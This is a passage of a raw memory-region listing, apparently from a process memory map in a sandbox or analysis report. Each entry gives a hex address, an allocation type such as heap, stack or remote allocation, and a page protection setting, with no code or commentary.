direct allocation
page read and write
617E000
heap
page read and write
80DC000
unkown
page execute read
3278000
heap
page read and write
301F000
unkown
page read and write
616B000
heap
page read and write
9412000
unkown
page readonly
2700000
heap
page read and write
2B51000
heap
page read and write
6188000
heap
page read and write
2B51000
heap
page read and write
A0D9000
direct allocation
page read and write
2B51000
heap
page read and write
3412000
heap
page read and write
71F000
stack
page read and write
326E000
stack
page read and write
1040000
heap
page read and write
2F50000
remote allocation
page read and write
2580000
heap
page read and write
CD6A000
heap
page read and write
956F000
unkown
page readonly
CCBE000
heap
page read and write
5F11000
heap
page read and write
2940000
heap
page read and write
5EDB000
heap
page read and write
2905000
heap
page read and write
2AAE000
heap
page read and write
2B51000
heap
page read and write
624E000
trusted library allocation
page read and write
55C3000
unkown
page execute read
61CE000
heap
page read and write
3364000
heap
page read and write
ACF000
unkown
page read and write
2A80000
heap
page read and write
C001000
heap
page read and write
3364000
heap
page read and write
2DF0000
heap
page read and write
2B43000
heap
page read and write
CCF5000
heap
page read and write
E1DE000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
5F11000
heap
page read and write
6185000
heap
page read and write
6F8D0000
unkown
page readonly
615000
heap
page read and write
2B51000
heap
page read and write
FE6000
heap
page read and write
D99E000
heap
page read and write
B16000
unkown
page read and write
2B51000
heap
page read and write
2E7C000
stack
page read and write
3168000
heap
page read and write
2910000
direct allocation
page read and write
97E2000
trusted library allocation
page read and write
94BB000
unkown
page readonly
31E4000
heap
page read and write
CC64000
heap
page read and write
CD28000
heap
page read and write
3640000
heap
page read and write
94E1000
unkown
page readonly
DF09000
heap
page read and write
2E00000
heap
page read and write
2A73000
heap
page read and write
90B0000
unkown
page read and write
D0C4000
heap
page read and write
2B4E000
stack
page read and write
32C3000
heap
page read and write
615C000
heap
page read and write
3362000
heap
page read and write
2B51000
heap
page read and write
9535000
unkown
page readonly
1058000
heap
page read and write
5EDB000
heap
page read and write
E119000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
5EE3000
heap
page read and write
2B36000
heap
page read and write
BD4B000
heap
page read and write
FFDD0000
direct allocation
page read and write
9CEF000
heap
page read and write
6198000
heap
page read and write
942A000
unkown
page readonly
CAE0000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
2B51000
heap
page read and write
943C000
unkown
page readonly
301A000
heap
page read and write
3166000
heap
page read and write
2B51000
heap
page read and write
12A000
stack
page read and write
301A000
heap
page read and write
2B51000
heap
page read and write
1002000
heap
page read and write
5F09000
heap
page read and write
2A06000
direct allocation
page read and write
D1CC000
heap
page read and write
9159000
unkown
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
9FD4000
unkown
page readonly
31CF000
heap
page read and write
5E90000
heap
page read and write
A3B6000
direct allocation
page read and write
CDAC000
heap
page read and write
BD8C000
heap
page read and write
1046000
heap
page read and write
2AAA000
heap
page read and write
9496000
unkown
page readonly
C318000
heap
page read and write
CBDE000
heap
page read and write
CF38000
heap
page read and write
C8C6000
heap
page read and write
6C05000
unkown
page execute read
CB06000
trusted library allocation
page read and write
2B82000
heap
page read and write
62F9000
trusted library allocation
page read and write
D083000
heap
page read and write
90C1000
unkown
page write copy
E220000
heap
page read and write
61FC000
heap
page read and write
3300000
heap
page read and write
6188000
heap
page read and write
61E9000
heap
page read and write
2A0E000
stack
page read and write
2B51000
heap
page read and write
A7BE000
stack
page read and write
B972000
heap
page read and write
DAA6000
heap
page read and write
12551000
heap
page read and write
27BD000
stack
page read and write
2B51000
heap
page read and write
834000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
6C60000
unkown
page execute read
2B50000
heap
page read and write
2A88000
heap
page read and write
5F0E000
heap
page read and write
D148000
heap
page read and write
2F70000
heap
page read and write
CAFB000
trusted library allocation
page read and write
2B60000
heap
page read and write
A14D000
direct allocation
page read and write
C0C6000
heap
page read and write
334F000
heap
page read and write
4D0C000
stack
page read and write
90D3000
unkown
page read and write
2820000
heap
page read and write
A299000
direct allocation
page read and write
CDAC000
heap
page read and write
2FD0000
heap
page read and write
CC57000
heap
page read and write
A404000
direct allocation
page read and write
30A0000
heap
page read and write
5F11000
heap
page read and write
A2A8000
direct allocation
page read and write
304E000
unkown
page read and write
E0D6000
heap
page read and write
30CC000
heap
page read and write
C630000
heap
page read and write
B27E000
stack
page read and write
61C8000
heap
page read and write
919E000
unkown
page write copy
AEDC000
direct allocation
page read and write
2B84000
heap
page read and write
32F1000
heap
page read and write
669A000
unkown
page execute read
C35A000
heap
page read and write
C94B000
heap
page read and write
D7D1000
heap
page read and write
31BF000
stack
page read and write
B96000
heap
page read and write
24AD000
stack
page read and write
AE32000
direct allocation
page read and write
2B51000
heap
page read and write
C2D6000
heap
page read and write
BCFE000
heap
page read and write
5EFC000
heap
page read and write
C9CE000
heap
page read and write
E64000
heap
page read and write
CB08000
trusted library allocation
page read and write
BE10000
heap
page read and write
328D000
heap
page read and write
5FF0000
remote allocation
page read and write
2A97000
heap
page read and write
2AA1000
heap
page read and write
9713000
trusted library allocation
page read and write
953B000
unkown
page readonly
61B1000
heap
page read and write
6A60000
unkown
page execute read
275B000
stack
page read and write
915D000
unkown
page read and write
9404000
unkown
page readonly
2900000
heap
page read and write
327C000
heap
page read and write
2B51000
heap
page read and write
3166000
heap
page read and write
CAE0000
trusted library allocation
page read and write
2BBE000
stack
page read and write
32C3000
heap
page read and write
94FE000
unkown
page readonly
62FB000
trusted library allocation
page read and write
32D3000
heap
page read and write
7937000
unkown
page execute read
C9A0000
trusted library allocation
page read and write
3412000
heap
page read and write
2B51000
heap
page read and write
25BD000
stack
page read and write
C738000
heap
page read and write
617B000
heap
page read and write
296D000
direct allocation
page read and write
1252E000
heap
page read and write
101E000
heap
page read and write
DD7C000
heap
page read and write
2B51000
heap
page read and write
E118000
heap
page read and write
29B6000
direct allocation
page read and write
9090000
unkown
page write copy
100D000
heap
page read and write
2B51000
heap
page read and write
6315000
unkown
page execute read
E408000
heap
page read and write
6188000
heap
page read and write
3281000
heap
page read and write
313C000
heap
page read and write
335E000
stack
page read and write
2B51000
heap
page read and write
A3BE000
direct allocation
page read and write
3353000
heap
page read and write
CAE4000
trusted library allocation
page read and write
23E0000
heap
page read and write
2A83000
heap
page read and write
2B51000
heap
page read and write
615E000
heap
page read and write
2FC0000
heap
page read and write
C4A4000
heap
page read and write
D2D4000
heap
page read and write
DEC6000
heap
page read and write
290B000
heap
page read and write
2B51000
heap
page read and write
5550000
heap
page read and write
2FC0000
heap
page read and write
30E0000
heap
page read and write
5EE5000
heap
page read and write
880000
heap
page read and write
BF5A000
heap
page read and write
2EF0000
heap
page read and write
2CE0000
heap
page read and write
2B51000
heap
page read and write
AAED000
stack
page read and write
9179000
unkown
page read and write
D148000
heap
page read and write
6DB6000
unkown
page execute read
D6B2000
heap
page read and write
2CF0000
heap
page read and write
CE3000
heap
page read and write
2B51000
heap
page read and write
2840000
heap
page read and write
6F8FF000
unkown
page read and write
3168000
heap
page read and write
CCD3000
heap
page read and write
61AA000
heap
page read and write
CAE0000
trusted library allocation
page read and write
5F11000
heap
page read and write
31D3000
heap
page read and write
90A3000
unkown
page read and write
C672000
heap
page read and write
2B76000
heap
page read and write
94BE000
unkown
page readonly
3330000
heap
page read and write
1055000
heap
page read and write
305D000
stack
page read and write
2734000
heap
page read and write
309F000
stack
page read and write
2927000
direct allocation
page read and write
3284000
heap
page read and write
A0D2000
direct allocation
page read and write
B972000
heap
page read and write
E15A000
heap
page read and write
A9EB000
stack
page read and write
CB06000
trusted library allocation
page read and write
31F0000
heap
page read and write
5EC5000
heap
page read and write
A54B000
direct allocation
page read and write
31A0000
heap
page read and write
400000
unkown
page readonly
954F000
unkown
page readonly
624A000
trusted library allocation
page read and write
5F09000
heap
page read and write
88E000
heap
page read and write
ACB000
unkown
page read and write
2723000
heap
page read and write
D358000
heap
page read and write
CCA4000
heap
page read and write
6180000
heap
page read and write
100C000
heap
page read and write
CA3E000
direct allocation
page read and write
2A40000
heap
page read and write
91A6000
unkown
page read and write
2B51000
heap
page read and write
6195000
heap
page read and write
D6F4000
heap
page read and write
2B51000
heap
page read and write
CCC8000
heap
page read and write
DD3A000
heap
page read and write
CC79000
heap
page read and write
81F000
heap
page read and write
6255000
trusted library allocation
page read and write
61A3000
heap
page read and write
6198000
heap
page read and write
29A8000
direct allocation
page read and write
29D4000
direct allocation
page read and write
5F07000
heap
page read and write
A5DC000
stack
page read and write
2B73000
heap
page read and write
90C6000
unkown
page read and write
B935000
heap
page read and write
E262000
heap
page read and write
2FF5000
heap
page read and write
5EDD000
heap
page read and write
5E96000
heap
page read and write
2B51000
heap
page read and write
9432000
unkown
page readonly
81F000
heap
page read and write
2EB0000
heap
page read and write
313D000
stack
page read and write
2B89000
heap
page read and write
617C000
heap
page read and write
2733000
heap
page read and write
32E0000
heap
page read and write
2E3D000
stack
page read and write
B9A000
heap
page read and write
93C6000
unkown
page readonly
6307000
trusted library allocation
page read and write
630F000
trusted library allocation
page read and write
94EB000
unkown
page readonly
DCB6000
heap
page read and write
D4A2000
heap
page read and write
E2A5000
heap
page read and write
6222000
heap
page read and write
C6B4000
heap
page read and write
7C0000
heap
page read and write
2B51000
heap
page read and write
5EF0000
heap
page read and write
A3B4000
direct allocation
page read and write
24BD000
stack
page read and write
6188000
heap
page read and write
2F30000
heap
page read and write
DC75000
heap
page read and write
2B51000
heap
page read and write
AE59000
direct allocation
page read and write
D40000
heap
page read and write
BC84000
heap
page read and write
D526000
heap
page read and write
CFFE000
heap
page read and write
CAE2000
trusted library allocation
page read and write
CCE6000
heap
page read and write
6243000
trusted library allocation
page read and write
2AAF000
heap
page read and write
951D000
unkown
page readonly
93E1000
unkown
page readonly
617B000
heap
page read and write
87D000
heap
page read and write
A2D0000
direct allocation
page read and write
1003000
heap
page read and write
E64000
heap
page read and write
6258000
trusted library allocation
page read and write
1040000
heap
page read and write
29E0000
heap
page read and write
6188000
heap
page read and write
683E000
heap
page read and write
6165000
heap
page read and write
B65E000
stack
page read and write
90AA000
unkown
page write copy
2B51000
heap
page read and write
9086000
unkown
page write copy
3750000
heap
page read and write
2B6F000
heap
page read and write
DB2A000
heap
page read and write
624A000
trusted library allocation
page read and write
61CE000
heap
page read and write
9563000
unkown
page readonly
BD4A000
heap
page read and write
AE18000
direct allocation
page read and write
B4BD000
stack
page read and write
5EDD000
heap
page read and write
DAA0000
heap
page read and write
1006000
heap
page read and write
61B4000
heap
page read and write
3403000
heap
page read and write
D316000
heap
page read and write
6180000
heap
page read and write
CC94000
heap
page read and write
2B51000
heap
page read and write
33E0000
heap
page read and write
630A000
trusted library allocation
page read and write
3413000
heap
page read and write
29F1000
direct allocation
page read and write
2B82000
heap
page read and write
6174000
heap
page read and write
E19C000
heap
page read and write
2D60000
heap
page read and write
422000
unkown
page execute read
E2A4000
heap
page read and write
A0A3000
direct allocation
page read and write
D526000
heap
page read and write
BF9C000
heap
page read and write
E094000
heap
page read and write
E262000
heap
page read and write
543E000
stack
page read and write
DE85000
heap
page read and write
5F11000
heap
page read and write
2B51000
heap
page read and write
9701000
trusted library allocation
page read and write
A408000
direct allocation
page read and write
334E000
stack
page read and write
E2E6000
heap
page read and write
A2C0000
direct allocation
page read and write
2B51000
heap
page read and write
CAE0000
trusted library allocation
page read and write
BDCE000
heap
page read and write
1046000
heap
page read and write
CD1E000
heap
page read and write
2B82000
heap
page read and write
109B000
heap
page read and write
2A50000
heap
page read and write
A0F1000
direct allocation
page read and write
A6EF000
heap
page read and write
5F0E000
heap
page read and write
3273000
heap
page read and write
3153000
heap
page read and write
2BF0000
heap
page read and write
2930000
heap
page read and write
62F4000
trusted library allocation
page read and write
44A0000
heap
page read and write
2905000
heap
page read and write
834000
heap
page read and write
2989000
direct allocation
page read and write
93CA000
unkown
page readonly
A292000
direct allocation
page read and write
6251000
trusted library allocation
page read and write
2B88000
heap
page read and write
3166000
heap
page read and write
BCFF000
heap
page read and write
616B000
heap
page read and write
AE93000
direct allocation
page read and write
D358000
heap
page read and write
61C8000
heap
page read and write
9079000
unkown
page read and write
D41E000
heap
page read and write
6150000
heap
page read and write
94F0000
unkown
page readonly
FE6000
heap
page read and write
A154000
direct allocation
page read and write
617B000
heap
page read and write
3156000
heap
page read and write
31A0000
heap
page read and write
405000
unkown
page execute read
90C2000
unkown
page read and write
630E000
trusted library allocation
page read and write
2B51000
heap
page read and write
D040000
heap
page read and write
B9B4000
heap
page read and write
3050000
heap
page read and write
DB6D000
heap
page read and write
328A000
heap
page read and write
CA10000
heap
page read and write
CB9C000
heap
page read and write
2B51000
heap
page read and write
2B82000
heap
page read and write
B937000
heap
page read and write
FBA000
heap
page read and write
940B000
unkown
page readonly
1007000
heap
page read and write
DE42000
heap
page read and write
DA22000
heap
page read and write
6252000
trusted library allocation
page read and write
884000
heap
page read and write
2B51000
heap
page read and write
DE01000
heap
page read and write
4AC000
unkown
page execute read
2B51000
heap
page read and write
D082000
heap
page read and write
919C000
unkown
page read and write
CE30000
heap
page read and write
6470000
trusted library allocation
page execute
29E2000
direct allocation
page read and write
837000
heap
page read and write
C252000
heap
page read and write
2900000
heap
page read and write
C2D6000
heap
page read and write
2B51000
heap
page read and write
C77A000
heap
page read and write
CAE6000
trusted library allocation
page read and write
FAF000
stack
page read and write
D250000
heap
page read and write
1040000
heap
page read and write
A512000
direct allocation
page read and write
43D0000
direct allocation
page execute and read and write
DDBE000
heap
page read and write
93EE000
unkown
page readonly
2B51000
heap
page read and write
B71E000
stack
page read and write
909F000
unkown
page read and write
2B33000
heap
page read and write
327F000
heap
page read and write
6198000
heap
page read and write
33BF000
stack
page read and write
31E3000
heap
page read and write
91A7000
unkown
page write copy
94CD000
unkown
page readonly
9444000
unkown
page readonly
2A50000
heap
page read and write
3350000
heap
page read and write
947F000
unkown
page readonly
C042000
heap
page read and write
AFD000
unkown
page read and write
3166000
heap
page read and write
6143000
heap
page read and write
2734000
heap
page read and write
3340000
heap
page read and write
2B51000
heap
page read and write
5F09000
heap
page read and write
C420000
heap
page read and write
2B51000
heap
page read and write
94CA000
unkown
page readonly
271F000
heap
page read and write
9452000
unkown
page readonly
E221000
heap
page read and write
A50B000
direct allocation
page read and write
2B51000
heap
page read and write
61C8000
heap
page read and write
5F07000
heap
page read and write
884000
heap
page read and write
CE00000
remote allocation
page read and write
6305000
trusted library allocation
page read and write
29DB000
direct allocation
page read and write
28FC000
stack
page read and write
D250000
heap
page read and write
2B51000
heap
page read and write
D736000
heap
page read and write
29FF000
direct allocation
page read and write
BA6000
heap
page read and write
1067000
heap
page read and write
3200000
heap
page read and write
617B000
heap
page read and write
DCD2000
direct allocation
page read and write
CCA4000
heap
page read and write
336A000
heap
page read and write
5F11000
heap
page read and write
C5AC000
heap
page read and write
44C0000
heap
page read and write
55DC000
unkown
page execute and read and write
A125000
direct allocation
page read and write
2B51000
heap
page read and write
FFF000
heap
page read and write
2B44000
heap
page read and write
3005000
heap
page read and write
3005000
heap
page read and write
55A0000
heap
page read and write
190000
heap
page read and write
D5EC000
heap
page read and write
327D000
heap
page read and write
D040000
heap
page read and write
616B000
heap
page read and write
2B51000
heap
page read and write
CEF6000
heap
page read and write
28DE000
stack
page read and write
25D0000
heap
page read and write
2A5C000
heap
page read and write
2B51000
heap
page read and write
103E000
heap
page read and write
2AA6000
heap
page read and write
94E3000
unkown
page readonly
A0AE000
direct allocation
page read and write
88E000
heap
page read and write
29BD000
direct allocation
page read and write
32B0000
heap
page read and write
2B5C000
heap
page read and write
2A83000
heap
page read and write
94A8000
unkown
page readonly
D526000
heap
page read and write
62F0000
trusted library allocation
page read and write
2B51000
heap
page read and write
1050000
heap
page read and write
6F6B000
unkown
page execute read
CB06000
trusted library allocation
page read and write
A00000
heap
page read and write
270C000
heap
page read and write
32D4000
heap
page read and write
D855000
heap
page read and write
5EE8000
heap
page read and write
9566000
unkown
page readonly
DF08000
heap
page read and write
2999000
direct allocation
page read and write
9700000
trusted library allocation
page read and write
2950000
direct allocation
page read and write
B973000
heap
page read and write
2B51000
heap
page read and write
5EE2000
heap
page read and write
BA4000
heap
page read and write
B901000
heap
page read and write
CE72000
heap
page read and write
29CC000
direct allocation
page read and write
BBCE000
heap
page read and write
2733000
heap
page read and write
305D000
stack
page read and write
CAF9000
trusted library allocation
page read and write
2B51000
heap
page read and write
D3DC000
heap
page read and write
CEB4000
heap
page read and write
A20000
heap
page read and write
D0A0000
heap
page read and write
92EF000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
FBE000
heap
page read and write
862000
heap
page read and write
A117000
direct allocation
page read and write
B3BC000
stack
page read and write
E328000
heap
page read and write
3350000
heap
page read and write
3370000
heap
page read and write
6F8F5000
unkown
page readonly
1060000
heap
page read and write
D99E000
heap
page read and write
5F0B000
heap
page read and write
A090000
direct allocation
page read and write
6301000
trusted library allocation
page read and write
9051000
unkown
page execute read
CAE0000
trusted library allocation
page read and write
2B51000
heap
page read and write
5560000
direct allocation
page execute and read and write
2B51000
heap
page read and write
C084000
heap
page read and write
67BF000
heap
page read and write
AE41000
direct allocation
page read and write
5F07000
heap
page read and write
CA9E000
stack
page read and write
105C000
heap
page read and write
908C000
unkown
page write copy
61CE000
heap
page read and write
2BFE000
stack
page read and write
2B83000
heap
page read and write
A0B5000
direct allocation
page read and write
916E000
unkown
page read and write
662D000
unkown
page execute read
BF9C000
heap
page read and write
62FC000
trusted library allocation
page read and write
DB6C000
heap
page read and write
2B51000
heap
page read and write
32EC000
heap
page read and write
6166000
heap
page read and write
32D4000
heap
page read and write
CCEF000
heap
page read and write
DAA6000
heap
page read and write
B90000
heap
page read and write
6198000
heap
page read and write
A3FE000
direct allocation
page read and write
DC32000
heap
page read and write
325F000
heap
page read and write
49C4000
heap
page read and write
31E3000
heap
page read and write
9483000
unkown
page readonly
2B51000
heap
page read and write
2B51000
heap
page read and write
9519000
unkown
page readonly
DBF0000
heap
page read and write
2B51000
heap
page read and write
342F000
stack
page read and write
61B7000
heap
page read and write
CA3C000
direct allocation
page read and write
61F5000
heap
page read and write
1043000
heap
page read and write
CF38000
heap
page read and write
2734000
heap
page read and write
945E000
unkown
page readonly
94F2000
unkown
page readonly
2B51000
heap
page read and write
2A20000
heap
page read and write
2B42000
heap
page read and write
BE94000
heap
page read and write
315D000
stack
page read and write
3356000
heap
page read and write
2A30000
heap
page read and write
2B51000
heap
page read and write
2F40000
heap
page read and write
3362000
heap
page read and write
CE00000
remote allocation
page read and write
9D0000
heap
page read and write
E0D6000
heap
page read and write
9448000
unkown
page readonly
CB5B000
heap
page read and write
362F000
stack
page read and write
A172000
direct allocation
page read and write
5F0B000
heap
page read and write
5EC5000
heap
page read and write
74FB000
unkown
page execute read
2B51000
heap
page read and write
4B4F000
stack
page read and write
C5EE000
heap
page read and write
FDF000
heap
page read and write
62F8000
trusted library allocation
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
2FF5000
heap
page read and write
B23A000
trusted library allocation
page read and write
5F11000
heap
page read and write
BC80000
heap
page read and write
1043000
heap
page read and write
6179000
heap
page read and write
E011000
heap
page read and write
DF4A000
heap
page read and write
6176000
heap
page read and write
DBAE000
heap
page read and write
CC26000
heap
page read and write
553F000
stack
page read and write
1251F000
heap
page read and write
2AA1000
heap
page read and write
CDEE000
heap
page read and write
C420000
heap
page read and write
2FDC000
heap
page read and write
C56A000
heap
page read and write
103E000
heap
page read and write
CC1F000
stack
page read and write
68BD000
heap
page read and write
414000
unkown
page execute read
6258000
trusted library allocation
page read and write
CAF9000
trusted library allocation
page read and write
6179000
heap
page read and write
FB0000
heap
page read and write
6180000
heap
page read and write
5F07000
heap
page read and write
2B51000
heap
page read and write
5EA0000
heap
page read and write
2B51000
heap
page read and write
BC01000
heap
page read and write
CB18000
heap
page read and write
D20E000
heap
page read and write
619B000
heap
page read and write
C18C000
heap
page read and write
3273000
heap
page read and write
2FD9000
heap
page read and write
AE4D000
direct allocation
page read and write
913C000
unkown
page read and write
104F000
heap
page read and write
5F09000
heap
page read and write
B931000
heap
page read and write
D812000
heap
page read and write
2F0E000
stack
page read and write
6255000
trusted library allocation
page read and write
29E9000
direct allocation
page read and write
2B51000
heap
page read and write
12559000
heap
page read and write
A11E000
direct allocation
page read and write
305E000
stack
page read and write
49B0000
heap
page read and write
5EA0000
heap
page read and write
31E4000
heap
page read and write
6F902000
unkown
page readonly
100D000
heap
page read and write
313F000
stack
page read and write
D95D000
heap
page read and write
CCE4000
heap
page read and write
2B51000
heap
page read and write
5F07000
heap
page read and write
5C3C000
stack
page read and write
2ABD000
heap
page read and write
29C4000
direct allocation
page read and write
4A4E000
stack
page read and write
DCB6000
heap
page read and write
61CE000
heap
page read and write
94FA000
unkown
page readonly
919B000
unkown
page write copy
2F50000
remote allocation
page read and write
BF18000
heap
page read and write
291D000
direct allocation
page read and write
2FF5000
heap
page read and write
AB3000
unkown
page read and write
55B1000
unkown
page execute read
9541000
unkown
page readonly
CE6000
heap
page read and write
2B51000
heap
page read and write
D896000
heap
page read and write
33FF000
heap
page read and write
CC62000
heap
page read and write
2A83000
heap
page read and write
2F4F000
stack
page read and write
61E9000
heap
page read and write
CA94000
heap
page read and write
6194000
heap
page read and write
3169000
heap
page read and write
75DD000
unkown
page execute read
2B51000
heap
page read and write
61FB000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
A4F0000
heap
page read and write
D5ED000
heap
page read and write
6251000
trusted library allocation
page read and write
315C000
stack
page read and write
EAE000
stack
page read and write
2A83000
heap
page read and write
1061000
heap
page read and write
CD6B000
heap
page read and write
E0D6000
heap
page read and write
2992000
direct allocation
page read and write
42C000
unkown
page execute read
4F4D000
stack
page read and write
1DD000
stack
page read and write
2FC7000
heap
page read and write
9713000
trusted library allocation
page read and write
A47E000
direct allocation
page read and write
304C000
heap
page read and write
91AA000
unkown
page readonly
29A0000
direct allocation
page read and write
944B000
unkown
page readonly
CFBC000
heap
page read and write
2D9E000
stack
page read and write
87E000
heap
page read and write
32D3000
heap
page read and write
B050000
trusted library allocation
page read and write
DF8C000
heap
page read and write
2B51000
heap
page read and write
2390000
heap
page read and write
DA64000
heap
page read and write
6185000
heap
page read and write
C0C6000
heap
page read and write
6245000
trusted library allocation
page read and write
D3DC000
heap
page read and write
2957000
direct allocation
page read and write
2B51000
heap
page read and write
65C0000
heap
page read and write
31B0000
heap
page read and write
35B0000
heap
page read and write
D95C000
heap
page read and write
610000
heap
page read and write
6946000
unkown
page execute read
C1CE000
heap
page read and write
2B51000
heap
page read and write
619A000
heap
page read and write
32BF000
stack
page read and write
1065000
heap
page read and write
BAC6000
heap
page read and write
5BFF000
stack
page read and write
2CF3000
heap
page read and write
C042000
heap
page read and write
26BD000
stack
page read and write
61B3000
heap
page read and write
332F000
unkown
page read and write
2D8D000
stack
page read and write
251D000
stack
page read and write
6180000
heap
page read and write
2B51000
heap
page read and write
E329000
heap
page read and write
CB08000
trusted library allocation
page read and write
2B84000
heap
page read and write
2B60000
heap
page read and write
295E000
direct allocation
page read and write
C801000
heap
page read and write
D39B000
heap
page read and write
2B51000
heap
page read and write
1253D000
heap
page read and write
32F5000
heap
page read and write
942E000
unkown
page readonly
D0C4000
heap
page read and write
E19D000
heap
page read and write
2B60000
heap
page read and write
61E9000
heap
page read and write
E2E6000
heap
page read and write
CB9C000
heap
page read and write
29AF000
direct allocation
page read and write
2940000
direct allocation
page read and write
907D000
unkown
page read and write
6258000
trusted library allocation
page read and write
3273000
heap
page read and write
31E3000
heap
page read and write
D250000
heap
page read and write
BD08000
heap
page read and write
2D6D000
stack
page read and write
C294000
heap
page read and write
C108000
heap
page read and write
32BE000
stack
page read and write
A15B000
direct allocation
page read and write
5EA2000
heap
page read and write
61A5000
heap
page read and write
7EE000
heap
page read and write
1061000
heap
page read and write
BB4A000
heap
page read and write
4CB0000
heap
page read and write
3210000
heap
page read and write
C908000
heap
page read and write
9520000
unkown
page readonly
1052000
heap
page read and write
2B51000
heap
page read and write
3279000
heap
page read and write
5E9C000
heap
page read and write
DAE8000
heap
page read and write
D91A000
heap
page read and write
D6F5000
heap
page read and write
9418000
unkown
page readonly
DAA6000
heap
page read and write
2B51000
heap
page read and write
232D000
stack
page read and write
BAF000
heap
page read and write
6246000
trusted library allocation
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
CAF9000
trusted library allocation
page read and write
7D8000
heap
page read and write
30E3000
heap
page read and write
6F8D1000
unkown
page execute read
4C9F000
stack
page read and write
2B51000
heap
page read and write
1E0000
heap
page read and write
CAE0000
trusted library allocation
page read and write
A575000
direct allocation
page read and write
E3FF000
heap
page read and write
3362000
heap
page read and write
CB08000
trusted library allocation
page read and write
C98C000
heap
page read and write
B1C000
unkown
page read and write
948C000
unkown
page readonly
5F09000
heap
page read and write
2B51000
heap
page read and write
1048000
heap
page read and write
2B51000
heap
page read and write
5FF0000
remote allocation
page read and write
341A000
heap
page read and write
6307000
trusted library allocation
page read and write
93D9000
unkown
page readonly
A0BC000
direct allocation
page read and write
D5AA000
heap
page read and write
BD8C000
heap
page read and write
C6F7000
heap
page read and write
1043000
heap
page read and write
C842000
heap
page read and write
C6F6000
heap
page read and write
6195000
heap
page read and write
CC3A000
heap
page read and write
E36A000
heap
page read and write
33BE000
unkown
page read and write
624C000
trusted library allocation
page read and write
2F7E000
unkown
page read and write
304C000
heap
page read and write
314F000
heap
page read and write
93E5000
unkown
page readonly
907E000
unkown
page write copy
D5AA000
heap
page read and write
30C0000
heap
page read and write
3403000
heap
page read and write
907F000
unkown
page read and write
A485000
direct allocation
page read and write
93DC000
unkown
page readonly
D91A000
heap
page read and write
2B51000
heap
page read and write
3414000
heap
page read and write
2F0F000
stack
page read and write
A320000
direct allocation
page read and write
2B51000
heap
page read and write
3362000
heap
page read and write
615D000
heap
page read and write
31E3000
heap
page read and write
617E000
heap
page read and write
CFBC000
heap
page read and write
948A000
unkown
page readonly
105C000
heap
page read and write
B37D000
stack
page read and write
D3DC000
heap
page read and write
62FB000
trusted library allocation
page read and write
2800000
heap
page read and write
3240000
heap
page read and write
DCB6000
heap
page read and write
2B51000
heap
page read and write
9479000
unkown
page readonly
2B51000
heap
page read and write
E15A000
heap
page read and write
9455000
unkown
page readonly
A1D0000
direct allocation
page read and write
2B51000
heap
page read and write
A10F000
direct allocation
page read and write
DD3A000
heap
page read and write
89C000
heap
page read and write
88E000
heap
page read and write
2B51000
heap
page read and write
C908000
heap
page read and write
30E3000
heap
page read and write
87A000
heap
page read and write
2B51000
heap
page read and write
CC4A000
heap
page read and write
AEC000
unkown
page write copy
2B51000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
352F000
unkown
page read and write
1040000
heap
page read and write
BA0000
heap
page read and write
2B51000
heap
page read and write
76CA000
unkown
page execute read
2FDA000
heap
page read and write
CA94000
heap
page read and write
DE00000
heap
page read and write
A482000
direct allocation
page read and write
2A84000
heap
page read and write
ABC000
unkown
page read and write
25AD000
stack
page read and write
6188000
heap
page read and write
2A8A000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
6256000
trusted library allocation
page read and write
103E000
heap
page read and write
D460000
heap
page read and write
C6B4000
heap
page read and write
2B51000
heap
page read and write
6198000
heap
page read and write
1080000
heap
page read and write
6AB9000
heap
page read and write
6309000
trusted library allocation
page read and write
DC74000
heap
page read and write
2F50000
remote allocation
page read and write
3292000
heap
page read and write
C462000
heap
page read and write
A101000
direct allocation
page read and write
2DD0000
heap
page read and write
B120000
trusted library allocation
page read and write
C4E6000
heap
page read and write
32D3000
heap
page read and write
CB08000
trusted library allocation
page read and write
89C000
heap
page read and write
881000
heap
page read and write
BCC6000
heap
page read and write
614E000
heap
page read and write
DFCE000
heap
page read and write
2B82000
heap
page read and write
62FD000
trusted library allocation
page read and write
A136000
direct allocation
page read and write
2B82000
heap
page read and write
4E4E000
stack
page read and write
CA3E000
direct allocation
page read and write
1042000
heap
page read and write
3450000
heap
page read and write
750000
trusted library allocation
page read and write
93C1000
unkown
page readonly
62F6000
trusted library allocation
page read and write
6155000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
9487000
unkown
page readonly
3363000
heap
page read and write
2B51000
heap
page read and write
CC20000
heap
page read and write
94C3000
unkown
page readonly
A4FC000
direct allocation
page read and write
C884000
heap
page read and write
941F000
unkown
page readonly
C98C000
heap
page read and write
300A000
heap
page read and write
D292000
heap
page read and write
3362000
heap
page read and write
1320D000
stack
page read and write
3033000
heap
page read and write
CF7A000
heap
page read and write
2E5D000
stack
page read and write
941B000
unkown
page readonly
CAE0000
trusted library allocation
page read and write
2734000
heap
page read and write
5EDB000
heap
page read and write
2B51000
heap
page read and write
32BF000
heap
page read and write
31E3000
heap
page read and write
6185000
heap
page read and write
CAA0000
direct allocation
page execute and read and write
2B51000
heap
page read and write
29B0000
heap
page read and write
3275000
heap
page read and write
A144000
direct allocation
page read and write
23F0000
heap
page read and write
D6B2000
heap
page read and write
AE10000
direct allocation
page read and write
D99E000
heap
page read and write
3220000
heap
page read and write
D1CC000
heap
page read and write
5F11000
heap
page read and write
7D0000
heap
page read and write
E262000
heap
page read and write
BED6000
heap
page read and write
304F000
unkown
page read and write
3406000
heap
page read and write
D0C4000
heap
page read and write
790000
heap
page read and write
61AF000
heap
page read and write
61F5000
heap
page read and write
94D9000
unkown
page readonly
BA01000
heap
page read and write
3413000
heap
page read and write
5F07000
heap
page read and write
C884000
heap
page read and write
1065000
heap
page read and write
6741000
heap
page read and write
E052000
heap
page read and write
4E0C000
stack
page read and write
9706000
trusted library allocation
page read and write
2A84000
heap
page read and write
C5AC000
heap
page read and write
31E3000
heap
page read and write
31D6000
heap
